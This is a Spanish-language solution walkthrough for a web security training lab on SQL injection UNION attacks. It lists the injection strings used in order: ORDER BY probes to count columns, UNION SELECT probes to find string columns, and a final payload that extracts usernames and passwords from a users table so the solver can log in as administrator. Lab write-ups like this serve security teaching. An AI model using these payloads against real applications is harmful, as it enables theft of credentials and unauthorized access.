Introducción

LABORATORIO 9: SQL injection UNION attack, retrieving data from other tables

Este laboratorio contiene una vulnerabilidad de inyección SQL en el filtro de categoría de producto. Los resultados de la consulta se devuelven en la respuesta de la aplicación, por lo que puede usar un ataque UNION para recuperar datos de otras tablas. Para construir un ataque de este tipo, debe combinar algunas de las técnicas que aprendió en los laboratorios anteriores.

La base de datos contiene una tabla diferente llamada users, con columnas llamadas username y password.

Para resolver el laboratorio, realice un ataque UNION de inyección SQL que recupere todos los nombres de usuario y contraseñas, y use la información para iniciar sesión como usuario administrator.

Solución

Determinar el número de columnas devueltas

' ORDER BY 1--

' ORDER BY 2--

' ORDER BY 3 -- 

En función de los resultados obtenidos, el número de columnas devueltas por la petición es 2.

Determinar que columnas contiene datos tipos string

' UNION SELECT 'a', NULL--

' UNION SELECT 'a', 'a'--

Por los resultados obtenidos, ambas columnas contienen datos de tipo string.

Consultar la base de datos para extraer datos interesantes

' UNION SELECT username, password FROM users --

Solo quedará introducir las credenciales del usuario administrator en el login para resolver el reto.